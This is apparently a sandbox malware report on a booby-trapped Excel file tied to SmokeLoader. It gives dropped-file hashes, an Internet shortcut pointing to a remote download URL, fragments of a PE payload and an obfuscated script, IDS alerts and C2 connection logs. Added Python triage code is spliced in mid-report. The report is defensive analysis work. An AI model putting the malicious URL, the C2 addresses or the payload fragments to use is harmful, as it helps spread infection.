                                                      File Type:MS Windows 95 Internet shortcut text (URL=<https://crash.sh/udMVqm>), ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):49
                                                      Entropy (8bit):4.598904996955671
                                                      Encrypted:false
                                                      SSDEEP:3:HRAbABGQYm2fSQ9vn:HRYFVm4Sin
                                                      MD5:5600438ECF077C640FB494D7BCD2F49C
                                                      SHA1:FA843E4478D9138229279BAB886D2795C342F781
                                                      SHA-256:515D2C37F9676E7CEFBA15139FEA925AC9FBC58EC44B5871AFCE05FDEA67318B
                                                      SHA-512:2157D7037A0604B4D784952914D32DF287B2147EC9C3137CBEDAAA7CDD60DA16C709EDFBFD904A48F61620DDF5F47D70424AFCEDCD918D8833438BD429485526
                                                      Malicious:true
                                                      Preview:[InternetShortcut]..URL=https://crash.sh/udMVqm..
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):162
                                                      Entropy (8bit):2.4797606462020303
                                                      Encrypted:false
                                                      SSDEEP:3:vrJlaCkWtVyWzUbGabuW0iWVlfln:vdsCkWtqb9bt2dl
                                                      MD5:B33B8593034E436C71DA5820F309CDF3
                                                      SHA1:61021B359E9ECBEBA3A941C907F03C4C7002F58E
                                                      SHA-256:82732B2A3E81F7CBE7A72A4DDA5679175EB54FF45A331B743F768739E4E45975
                                                      SHA-512:2CA8AB8261B68676E34E0B1D7BCD14064B7EFE9AB28C6071FEBB13B056D547782F5DECE788115AFFF9EC35A85B8BF6957DA725E82D0E276419FA64AF9FC79D85
                                                      Malicious:false
                                                      Preview:.user..................................................A.l.b.u.s.............p........1@..............2@.............@3@..............3@.....z.......p4@.....x...
                                                      Process:C:\Windows\explorer.exe
                                                      File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):64704
                                                      Entropy (8bit):6.02370063609959
                                                      Encrypted:false
                                                      SSDEEP:768:f8XcJiMjm2ieHlPyCsSuJbn8dBhFRHSMM6Iq8HSYDKJENf+i6CBpTX:TYMaNylPYSAb8dBnhHr4DKKNf+GBp
                                                      MD5:8FE9545E9F72E460723F484C304314AD
                                                      SHA1:3718A40FFC3AF2613B8B5FE41C475D85FF0522F4
                                                      SHA-256:D2F0B87E2D2707685C4D35F8F05B42FB8326EF4E70D16097B8837DABA06AC961
                                                      SHA-512:0738526EB2E6C485528C6B5A8DDABB51F095C134E010F9F3F25F341ABBE7A63072B0E2C2B161713D28B93F2A33C1476A0FED2D64FF86C9547DA9AF34DC90529A
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 0%
• Antivirus: Virustotal, Detection: 0%
Joe Sandbox View:
• Filename: capcut Setup-x64.msi, Detection: malicious
• Filename: 7YZlAbfKMg.rtf, Detection: malicious
• Filename: Product Inquiry466789.xls, Detection: malicious
• Filename: A24-00342B139336 #TW_Inquiry.xls, Detection: malicious
• Filename: LgTFM1JlJu.rtf, Detection: malicious
• Filename: #20240627_Edlen_B.xls, Detection: malicious
• Filename: #20240627_Edlen_A.xls, Detection: malicious
• Filename: Requirements.xla.xlsx, Detection: malicious
• Filename: vns.exe, Detection: malicious
• Filename: Doc606112.xls, Detection: malicious
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...pn.\..............0.............^.... ........@.. ....................... ............`.....................................O.......8................>........................................................... ............... ..H............text...d.... ...................... ..`.rsrc...8...........................@..@.reloc..............................@..B................@.......H........A...p..........T................................................~P...-.r...p.....(....(....s.....P...*..0.."........(......-.r...p.rI..p(....s....z.*...0..........(....~P.....o......*..(....*n(.....(..........%...(....*~(.....(..........%...%...(....*.(.....(..........%...%...%...(....*V.(......}Q.....}R...*..{Q...*..{R...*...0...........(.......i.=...}S......i.@...}T......i.@...}U.....+m...(....o .....r]..p.o!...,..{T.......{U........o"....+(.ra..p.o!...,..{T.......
                                                      Process:C:\Windows\explorer.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):339146
                                                      Entropy (8bit):7.999527119862136
                                                      Encrypted:true
                                                      SSDEEP:6144:VsBND2PSq1ECXV18AlJpzJZo/JubMz28YtTqxTNth5vG+rlQ:iB52PSq1xOb/JhnYtTqxTza+C
                                                      MD5:7F672F88838E6C8E8B2BAC92939F270F
                                                      SHA1:D9B47CB968EAFE3C1C94EBD6B9C66CED01EE61A0
                                                      SHA-256:5F65E9BEBC1D29DA1D85F0FCB0DE63F68D6AE347494006BD10E9A2DE2D8E2AF2
                                                      SHA-512:4D52087C364B2BF6C3841D2E2CF7169DDC1AFE368DA33BA013889FD6573E290DD7AB9729AD2250864E709BB464B81F28196762C57CD0A5AE6846D9DB4BEDEE0A
                                                      Malicious:false
                                                      Preview:.&..K..d...C...x.......'....x..rmS....L.5..U. b...q.2=.>.R=..;.....Sl.k....gbQ.Zl=9E...8..E|D.....U.Nw..qf.S.....s3^..o+...?ag.%....".m..{.l.S.$.h'.....{.;...G.......W..tO..]..;3.Z......=v..C9E...`/.W./.FxJ...E..J..q....b.v...p.K@.n..D.....0.t....Z.6.MB.|hQ........,...j.W.,^..[l-..;...oh.uU6.N.....TZQ...0...S^d...k.R....QjF.J..D)x.....>..W.(..[[h..`.%+@..y(...tW..JVo...H#.y{.I....45..'k..j..r.....WR6t...i.= Yr......4n.*U.}x.M+:.C`.G3.>...;..$j.....!...1.....ab.8...,.....8]....i.........4.X.._..<.......N.0Q.........+a)..mP.....8p........~l^K..C'.A.......<,b..B..)..Q..x.YS..h..!9}`D..3.$.EH.Q..|.M[...}W..{.W.\.M.W..2.l.(....J]O...SY..M. ......w^...TlN..(..|C..'o.O.F.;?..Ix..H....z..(.o..ua..^?............zq5...>.....V|.Ec:...7....d[.s..@...mT-.3....z..%.Y.".3.W..B....!...H....J..v.pz.b`...e..]y..fz.d..mj`.r.qIO8h.8._....M./.e6.:..o.#. u(....E.#.-=Pr......wO.~..J6".7..)..i..Lh.i...i.5.x..iI....V.D.0*....O.<.F...\=...=...0h.........+!zTz
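The hash, size and entropy columns above can be checked by hand for every file whose preview is printed in full: the four 1-byte "1" drops from powershell.exe, the two 512-byte all-zero EXCEL.EXE drops, the two .url shortcuts pointing at crash.sh and the desktop.ini-style listing that names them. The same arithmetic explains the Encrypted:true verdict on the 339146-byte explorer.exe drop: 7.9995 bits per byte is exactly what a uniformly random byte string of that length scores. The Python below is an added triage example, not Joe Sandbox code and not part of this report. Its sample inputs are reconstructed from the previews (a "." in a text preview stands for a CR or LF byte), the pseudo-random blob standing in for the encrypted drop is constructed, and the 7.9 entropy cut-off is an assumption, not the sandbox's rule.

```python
import hashlib
import math
import random

# Sample inputs, constructed byte-for-byte from the previews the report prints
# in full (each "." in those text previews is one CR or LF byte).
ONE_BYTE_FILE = b"1"                          # the four powershell.exe drops
NULL_SECTOR = b"\x00" * 512                   # the two 512-byte EXCEL.EXE drops
URL_ROOT = b"[InternetShortcut]\r\nURL=https://crash.sh/\r\n"
URL_PATH = b"[InternetShortcut]\r\nURL=https://crash.sh/udMVqm\r\n"
DESKTOP_INI = (b"[folders]\r\nudMVqm.url=0\r\ncrash.sh.url=0\r\n40830001.LNK=0\r\n"
               b"[xls]\r\n40830001.LNK=0\r\n")

# Constructed stand-in for the 339146-byte explorer.exe drop, which the report
# does not print in full: deterministic pseudo-random bytes of the same length.
_rng = random.Random(20240830)
RANDOM_BLOB = bytes(_rng.getrandbits(8) for _ in range(339146))

ENTROPY_ENCRYPTED = 7.9   # assumed cut-off; the report marks the 7.9995 blob Encrypted:true


def entropy_8bit(data: bytes) -> float:
    """Shannon entropy in bits per byte, the report's 'Entropy (8bit)' column."""
    n = len(data)
    if n == 0:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def digests(data: bytes) -> dict:
    """MD5 / SHA1 / SHA-256 / SHA-512, upper-cased like the report's hash rows."""
    return {name: hashlib.new(name, data).hexdigest().upper()
            for name in ("md5", "sha1", "sha256", "sha512")}


def internet_shortcut_url(data: bytes):
    """URL= target of an [InternetShortcut] file, or None if the file is not one."""
    lines = [ln.strip() for ln in data.decode("latin-1").splitlines()]
    if not lines or lines[0].lower() != "[internetshortcut]":
        return None
    for ln in lines[1:]:
        if ln.lower().startswith("url="):
            return ln[4:]
    return None


def ini_sections(data: bytes) -> dict:
    """Minimal INI parser for the desktop.ini-style drop: {section: {key: value}}."""
    sections, current = {}, None
    for ln in data.decode("latin-1").splitlines():
        ln = ln.strip()
        if not ln:
            continue
        if ln.startswith("[") and ln.endswith("]"):
            current = ln[1:-1]
            sections[current] = {}
        elif "=" in ln and current is not None:
            key, value = ln.split("=", 1)
            sections[current][key.strip()] = value.strip()
    return sections


def shortcuts_listed_in_ini(ini: bytes) -> list:
    """Names of .url entries across all sections (the WINWORD-modified file lists two)."""
    names = []
    for keys in ini_sections(ini).values():
        names.extend(k for k in keys if k.lower().endswith(".url"))
    return sorted(set(names))


def triage(data: bytes) -> dict:
    """Apply the checks the report's columns encode and return hashes plus verdict reasons."""
    ent = entropy_8bit(data)
    reasons = []
    if ent >= ENTROPY_ENCRYPTED:
        reasons.append("high entropy: encrypted or compressed payload")
    url = internet_shortcut_url(data)
    if url is not None and url.split(":", 1)[0].lower() in ("http", "https", "ftp"):
        reasons.append(f"Internet shortcut to remote target {url}")
    return {"size": len(data), "entropy": ent, "hashes": digests(data), "reasons": reasons}


if __name__ == "__main__":
    for label, blob in [("1-byte", ONE_BYTE_FILE), ("512 nulls", NULL_SECTOR),
                        ("crash.sh.url", URL_ROOT), ("udMVqm.url", URL_PATH),
                        ("random blob", RANDOM_BLOB)]:
        t = triage(blob)
        print(f"{label:12} size={t['size']:7} entropy={t['entropy']:.6f} "
              f"md5={t['hashes']['md5']} {t['reasons']}")
    print("desktop.ini lists:", shortcuts_listed_in_ini(DESKTOP_INI))
```

Two things worth noting when reading the report with this in hand: identical hash rows across several drops (the four "1" files, the two 512-byte zero sectors) are the same bytes written to different paths, not evidence of anything beyond Office and PowerShell housekeeping, while a .url whose target is a remote https host and a modified INI that enumerates it alongside a .LNK are the rows that deserve the Malicious:true flag they carry.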
                                                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):183084
                                                      Entropy (8bit):3.886576284833851
                                                      Encrypted:false
                                                      SSDEEP:3072:bYFoL2rQi6toiBDgt5p0Gwo9QjS7/DVRq9f1y9uuYaROM5e:0uqrh6BGqykae
                                                      MD5:5AC26F4D93962796DB9CD2E19B32B200
                                                      SHA1:9856C349AD2B408CDD23AA63A620F22FBDA87FA3
                                                      SHA-256:E3E7A3D0BA55B8DBBE3633B1DAD0A3BBF4EADA72DD8DF3F7B1BC76A692862F23
                                                      SHA-512:4C806A0A8FBA3FA9B24A0631D5A3E12F87E21AB3E45F44ECA8DE8C756F436B56E14D383A8B871BD5B5781624AC10E55F2FAD92DE02FA98E6FA53F57D6864B00A
                                                      Malicious:true
                                                      Preview:......a.O.L.h.K.f.L.q.J.U. .=. .".Z.n.f.L.W.m.C.c.G.n.".....U.z.p.u.L.N.N.f.K.k. .=. .".O.e.h.A.Q.W.U.x.L.L.".....L.c.g.O.G.K.m.K.c.L. .=. .".H.b.L.k.L.t.L.W.c.Q.".....v.c.U.s.f.l.Z.R.l.C. .=. .".m.L.u.b.S.T.k.K.W.h.".....k.O.G.G.J.A.l.U.e.f. .=. .".Z.R.f.K.z.W.L.Z.J.b.".....U.z.G.O.h.b.i.W.W.U. .=. .".Z.h.i.K.J.L.G.c.x.L.".....R.N.W.W.P.c.W.L.p.k. .=. .".i.n.L.c.R.a.L.O.R.T.".........L.J.R.H.p.W.O.L.i.A. .=. .".H.A.N.i.C.K.K.a.o.W.".....L.l.i.x.u.b.W.i.P.a. .=. .".e.C.P.x.b.Z.k.A.Q.c.".....c.a.W.i.l.m.i.U.Z.o. .=. .".P.O.b.f.c.P.W.t.m.W.".....p.b.n.Q.m.p.o.i.K.u. .=. .".Q.k.Z.A.v.l.I.x.c.J.".....P.q.i.G.N.O.k.W.u.S. .=. .".u.N.U.K.c.i.G.p.d.h.".....U.g.n.I.L.e.z.U.i.t. .=. .".I.W.G.c.L.u.h.W.H.k.".....o.a.k.C.e.o.A.L.z.i. .=. .".P.W.Z.Z.K.m.A.O.l.f.".....C.N.i.P.K.n.o.h.s.e. .=. .".N.G.U.q.L.d.i.z.G.W.".....P.c.K.P.T.W.k.e.Q.L. .=. .".s.h.N.H.b.z.k.W.T.W.".....L.N.G.L.t.A.H.i.d.G. .=. .".k.h.U.h.J.A.i.Z.P.W.".........P.c.Z.W.h.a.U.a.Q.s. .=. .".c.c.v.G.G.k.H.G.T.f.".....z.z.k.P.x.L.K.
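In the preview of the EQNEDT32.EXE drop every character is followed by a ".", which is the zero high byte of UTF-16LE text, as the File Type line says; decoded, the visible lines are runs of name = "literal" assignments with random ten-character identifiers on both sides, the usual padding placed around a small real payload. The Python below is an added example, not from this report (which does not identify the scripting language): it decodes such a drop and strips assignments whose names are never referenced on any other line. The visible lines are taken from the preview; the final result = ... line is a constructed placeholder so the filter has something to keep, and is not in the dropped file.

```python
import re

# Constructed sample: the assignment lines visible in the report's preview, plus
# one constructed placeholder line that references two of the identifiers.
VISIBLE_LINES = [
    'aOLhKfLqJU = "ZnfLWmCcGn"',
    'UzpuLNNfKk = "OehAQWUxLL"',
    'LcgOGKmKcL = "HbLkLtLWcQ"',
    'vcUsflZRlC = "mLubSTkKWh"',
    'kOGGJAlUef = "ZRfKzWLZJb"',
    'UzGOhbiWWU = "ZhiKJLGcxL"',
    'RNWWPcWLpk = "inLcRaLORT"',
    '',
    'LJRHpWOLiA = "HANiCKKaoW"',
    'LlixubWiPa = "eCPxbZkAQc"',
    'caWilmiUZo = "PObfcPWtmW"',
]
PLACEHOLDER_TAIL = "result = aOLhKfLqJU + caWilmiUZo"   # constructed, not in the drop

# Re-encode as the report describes the file: UTF-16 little-endian with BOM and
# CRLF terminators. The preview's six leading dots are the BOM plus one CRLF.
SAMPLE_UTF16 = b"\xff\xfe" + (
    "\r\n" + "\r\n".join(VISIBLE_LINES + [PLACEHOLDER_TAIL]) + "\r\n"
).encode("utf-16-le")

ASSIGN_RE = re.compile(r'^\s*([A-Za-z_]\w*)\s*=\s*"[^"]*"\s*$')
IDENT_RE = re.compile(r"[A-Za-z_]\w*")


def decode_dropped_text(data: bytes) -> list:
    """Decode a UTF-16 text drop (BOM-aware) into its CRLF-separated lines."""
    return data.decode("utf-16").split("\r\n")


def strip_dead_assignments(lines: list):
    """Remove name = "literal" lines whose name is never used elsewhere.

    Returns (kept_lines, removed_names). A pure literal assignment references
    nothing, so only the other lines count as uses.
    """
    assigned = set()
    referenced = set()
    for ln in lines:
        m = ASSIGN_RE.match(ln)
        if m:
            assigned.add(m.group(1))
        else:
            referenced.update(IDENT_RE.findall(ln))
    dead = assigned - referenced
    kept = []
    for ln in lines:
        m = ASSIGN_RE.match(ln)
        if m and m.group(1) in dead:
            continue
        if ln.strip():
            kept.append(ln)
    return kept, sorted(dead)


def junk_ratio(lines: list) -> float:
    """Fraction of non-blank lines that are dead literal assignments."""
    nonblank = [ln for ln in lines if ln.strip()]
    _, dead = strip_dead_assignments(lines)
    return len(dead) / len(nonblank) if nonblank else 0.0


if __name__ == "__main__":
    lines = decode_dropped_text(SAMPLE_UTF16)
    kept, dead = strip_dead_assignments(lines)
    print(f"{len(dead)} dead assignments removed, junk ratio {junk_ratio(lines):.2f}")
    for ln in kept:
        print(ln)
```

On the real 183084-byte drop the ratio is what tells you how much of the file is padding; the lines that survive the filter are the ones to read.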
                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Jul 31 14:51:32 2024, Security: 1
                                                      Category:dropped
                                                      Size (bytes):583680
                                                      Entropy (8bit):7.982788107216866
                                                      Encrypted:false
                                                      SSDEEP:12288:alVkeyoayzIt5bTbBkBl9bMt350kwuyQrfEBtWOouFl6V:agwzOTlil9sGkLPEBtXC
                                                      MD5:69D815B3C5C65DA9CB98470EE87F5690
                                                      SHA1:B5633BDD4EBD3050F0A1583D9CEE311364E193E4
                                                      SHA-256:FE7AEEC88AA981F42A10D6510222CB44150B537C57D5803DFECBFD96FE0321D3
                                                      SHA-512:BBA64D01BA34FEBF0BC6031C160BD134ABBAA17DF3E46EAAEE04A501F7C9EAD2CB9277453ECACD136FCC71E4B40FB53E158ADF6322C4C76710ECD09A30604E4C
                                                      Malicious:true
                                                      Preview:......................>...................................6...................x.......z.......|.......~...............................................................................................................................................................................................................................................................................................................................................................................................................................r................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...........q...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...y.......z...
                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Jul 31 14:51:32 2024, Security: 1
                                                      Category:dropped
                                                      Size (bytes):583680
                                                      Entropy (8bit):7.982788107216866
                                                      Encrypted:false
                                                      SSDEEP:12288:alVkeyoayzIt5bTbBkBl9bMt350kwuyQrfEBtWOouFl6V:agwzOTlil9sGkLPEBtXC
                                                      MD5:69D815B3C5C65DA9CB98470EE87F5690
                                                      SHA1:B5633BDD4EBD3050F0A1583D9CEE311364E193E4
                                                      SHA-256:FE7AEEC88AA981F42A10D6510222CB44150B537C57D5803DFECBFD96FE0321D3
                                                      SHA-512:BBA64D01BA34FEBF0BC6031C160BD134ABBAA17DF3E46EAAEE04A501F7C9EAD2CB9277453ECACD136FCC71E4B40FB53E158ADF6322C4C76710ECD09A30604E4C
                                                      Malicious:false
                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):26
                                                      Entropy (8bit):3.95006375643621
                                                      Encrypted:false
                                                      SSDEEP:3:ggPYV:rPYV
                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                      Malicious:false
                                                      Preview:[ZoneTransfer]....ZoneId=0
                                                      File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Aug 30 00:43:19 2024, Security: 1
                                                      Entropy (8bit):7.961830954141762
                                                      TrID:
                                                      • Microsoft Excel sheet (30009/1) 47.99%
                                                      • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                      • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                      File name:40830001.xls
                                                      File size:583'168 bytes
                                                      MD5:a230c030160d04f7fa28fa4d48d71584
                                                      SHA1:802288792e4b687e1f7f9cfb48086bc28e0152e3
                                                      SHA256:cb92d320fc9bc674e8d37ceeebf0363f8e96dd67ef4ef543b3348f96ef567e5f
                                                      SHA512:7259066fd1b2ff42551cc1d27fae07596e90992e11b12834a51cdbd0190360d44ebb6d8011e245738e2ebbe394fd75b337dfb2d0e396bc9456d1186b39f198cb
                                                      SSDEEP:12288:Gl3meS+nx6mzcyd9cOSaH9bodJMC6lVMBtDh30zHJiUQ3U1wC:G1meS+rwyzcOSa5odJVrliHuU
                                                      TLSH:AEC4239333F5CF13CCD3387744C5DA9BA6A5BD15AF22D96B72817B1DAA3039088045AB
                                                      Icon Hash:276ea3a6a6b7bfbf
                                                      Document Type:OLE
                                                      Number of OLE Files:1
                                                      Has Summary Info:
                                                      Application Name:Microsoft Excel
                                                      Encrypted Document:True
                                                      Contains Word Document Stream:False
                                                      Contains Workbook/Book Stream:True
                                                      Contains PowerPoint Document Stream:False
                                                      Contains Visio Document Stream:False
                                                      Contains ObjectPool Stream:False
                                                      Flash Objects Count:0
                                                      Contains VBA Macros:True
                                                      Code Page:1252
                                                      Author:
                                                      Last Saved By:
                                                      Create Time:2006-09-16 00:00:00
                                                      Last Saved Time:2024-08-29 23:43:19
                                                      Creating Application:Microsoft Excel
                                                      Security:1
                                                      Document Code Page:1252
                                                      Thumbnail Scaling Desired:False
                                                      Contains Dirty Links:False
                                                      Shared Document:False
                                                      Changed Hyperlinks:False
                                                      Application Version:786432
                                                      General
                                                      Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                                      VBA File Name:Sheet1.cls
                                                      Stream Size:977
                                                      Attribute VB_Name = "Sheet1"
                                                      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                      Attribute VB_GlobalNameSpace = False
                                                      Attribute VB_Creatable = False
                                                      Attribute VB_PredeclaredId = True
                                                      Attribute VB_Exposed = True
                                                      Attribute VB_TemplateDerived = False
                                                      Attribute VB_Customizable = True
                                                      

                                                      General
                                                      Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                                                      VBA File Name:Sheet2.cls
                                                      Stream Size:977
                                                      Attribute VB_Name = "Sheet2"
                                                      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                      Attribute VB_GlobalNameSpace = False
                                                      Attribute VB_Creatable = False
                                                      Attribute VB_PredeclaredId = True
                                                      Attribute VB_Exposed = True
                                                      Attribute VB_TemplateDerived = False
                                                      Attribute VB_Customizable = True
                                                      

                                                      General
                                                      Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                                                      VBA File Name:Sheet3.cls
                                                      Stream Size:977
                                                      Attribute VB_Name = "Sheet3"
                                                      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                      Attribute VB_GlobalNameSpace = False
                                                      Attribute VB_Creatable = False
                                                      Attribute VB_PredeclaredId = True
                                                      Attribute VB_Exposed = True
                                                      Attribute VB_TemplateDerived = False
                                                      Attribute VB_Customizable = True
                                                      

                                                      General
                                                      Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                                      VBA File Name:ThisWorkbook.cls
                                                      Stream Size:985
                                                      Attribute VB_Name = "ThisWorkbook"
                                                      Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                                      Attribute VB_GlobalNameSpace = False
                                                      Attribute VB_Creatable = False
                                                      Attribute VB_PredeclaredId = True
                                                      Attribute VB_Exposed = True
                                                      Attribute VB_TemplateDerived = False
                                                      Attribute VB_Customizable = True
                                                      

                                                      General
                                                      Stream Path:\x1CompObj
                                                      CLSID:
                                                      File Type:data
                                                      Stream Size:114
                                                      Entropy:4.25248375192737
                                                      Base64 Encoded:True
                                                      General
                                                      Stream Path:\x5DocumentSummaryInformation
                                                      CLSID:
                                                      File Type:data
                                                      Stream Size:244
                                                      Entropy:2.889430592781307
                                                      Base64 Encoded:False
                                                      General
                                                      Stream Path:\x5SummaryInformation
                                                      CLSID:
                                                      File Type:data
                                                      Stream Size:200
                                                      Entropy:3.3020681057018666
                                                      Base64 Encoded:False
                                                      General
                                                      Stream Path:MBD0018266C/\x1CompObj
                                                      CLSID:
                                                      File Type:data
                                                      Stream Size:99
                                                      Entropy:3.631242196770981
                                                      Base64 Encoded:False
                                                      General
                                                      Stream Path:MBD0018266C/Package
                                                      CLSID:
                                                      File Type:Microsoft Excel 2007+
                                                      Stream Size:26097
                                                      Entropy:7.747483970792256
                                                      Base64 Encoded:True
                                                      General
                                                      Stream Path:MBD0018266D/\x1Ole
                                                      CLSID:
                                                      File Type:data
                                                      Stream Size:450
                                                      Entropy:6.621035621477545
                                                      Base64 Encoded:False
                                                      General
                                                      Stream Path:Workbook
                                                      CLSID:
                                                      File Type:Applesoft BASIC program data, first line number 16
                                                      Stream Size:538495
                                                      Entropy:7.999354373436339
                                                      Base64 Encoded:True
                                                      General
                                                      Stream Path:_VBA_PROJECT_CUR/PROJECT
                                                      CLSID:
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Stream Size:529
                                                      Entropy:5.257715779206793
                                                      Base64 Encoded:True
                                                      General
                                                      Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                                      CLSID:
                                                      File Type:data
                                                      Stream Size:104
                                                      Entropy:3.0488640812019017
                                                      Base64 Encoded:False
                                                      General
                                                      Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                                      CLSID:
                                                      File Type:data
                                                      Stream Size:2644
                                                      Entropy:3.995305828407127
                                                      Base64 Encoded:False
                                                      General
                                                      Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                                      CLSID:
                                                      File Type:data
                                                      Stream Size:553
                                                      Entropy:6.383175665558567
                                                      Base64 Encoded:True
                                                      Timestamp | Protocol | SID | Signature | Severity | Source Port | Dest Port | Source IP | Dest IP
                                                      2024-08-31T15:51:50.730698+0200 | TCP | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 49174 | 80 | 192.168.2.22 | 185.251.91.119
                                                      2024-08-31T15:51:45.412770+0200 | TCP | 2039103 | ET MALWARE Suspected Smokeloader Activity (POST) | 1 | 49173 | 80 | 192.168.2.22 | 185.251.91.119
                                                      2024-08-31T15:51:45.746647+0200 | TCP | 2829848 | ETPRO MALWARE SmokeLoader encrypted module (3) | 2 | 80 | 49173 | 185.251.91.119 | 192.168.2.22
                                                      2024-08-31T15:51:21.432233+0200 | TCP | 2049038 | ET MALWARE Malicious Base64 Encoded Payload In Image | 1 | 443 | 49171 | 207.241.232.154 | 192.168.2.22
                                                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                      Aug 31, 2024 15:50:57.302314043 CEST | 49161 | 443 | 192.168.2.22 | 208.64.171.230
                                                      Aug 31, 2024 15:50:57.302346945 CEST | 443 | 49161 | 208.64.171.230 | 192.168.2.22
                                                      Aug 31, 2024 15:50:57.302392006 CEST | 49161 | 443 | 192.168.2.22 | 208.64.171.230
                                                      Aug 31, 2024 15:50:57.309107065 CEST | 49161 | 443 | 192.168.2.22 | 208.64.171.230
                                                      Aug 31, 2024 15:50:57.309123993 CEST | 443 | 49161 | 208.64.171.230 | 192.168.2.22
                                                      Aug 31, 2024 15:50:57.849262953 CEST | 443 | 49161 | 208.64.171.230 | 192.168.2.22
                                                      Aug 31, 2024 15:50:57.849344015 CEST | 49161 | 443 | 192.168.2.22 | 208.64.171.230
                                                      Aug 31, 2024 15:50:57.854614019 CEST | 49161 | 443 | 192.168.2.22 | 208.64.171.230
                                                      Aug 31, 2024 15:50:57.854631901 CEST | 443 | 49161 | 208.64.171.230 | 192.168.2.22
                                                      Aug 31, 2024 15:50:57.854971886 CEST | 443 | 49161 | 208.64.171.230 | 192.168.2.22
                                                      Aug 31, 2024 15:50:57.855030060 CEST | 49161 | 443 | 192.168.2.22 | 208.64.171.230
                                                      Aug 31, 2024 15:50:57.924000025 CEST | 49161 | 443 | 192.168.2.22 | 208.64.171.230
                                                      Aug 31, 2024 15:50:57.968498945 CEST | 443 | 49161 | 208.64.171.230 | 192.168.2.22
                                                      Aug 31, 2024 15:50:58.063348055 CEST | 443 | 49161 | 208.64.171.230 | 192.168.2.22
                                                      Aug 31, 2024 15:50:58.063431978 CEST | 443 | 49161 | 208.64.171.230 | 192.168.2.22
                                                      Aug 31, 2024 15:50:58.063452005 CEST | 49161 | 443 | 192.168.2.22 | 208.64.171.230
                                                      Aug 31, 2024 15:50:58.063492060 CEST | 49161 | 443 | 192.168.2.22 | 208.64.171.230
                                                      Aug 31, 2024 15:50:58.064735889 CEST49161443192.168.2.22208.64.171.230
                                                      Aug 31, 2024 15:50:58.064758062 CEST44349161208.64.171.230192.168.2.22
                                                      Aug 31, 2024 15:50:58.096765995 CEST4916280192.168.2.2223.94.148.16
                                                      Aug 31, 2024 15:50:58.101739883 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:58.101845980 CEST4916280192.168.2.2223.94.148.16
                                                      Aug 31, 2024 15:50:58.102224112 CEST4916280192.168.2.2223.94.148.16
                                                      Aug 31, 2024 15:50:58.107223988 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:58.600771904 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:58.600795984 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:58.600806952 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:58.600816965 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:58.600827932 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:58.600832939 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:58.600842953 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:58.600852013 CEST804916223.94.148.16192.168.2.22
                                                      Aug 31, 2024 15:50:58.600862026 CEST804916223.94.148.16192.168.2.22
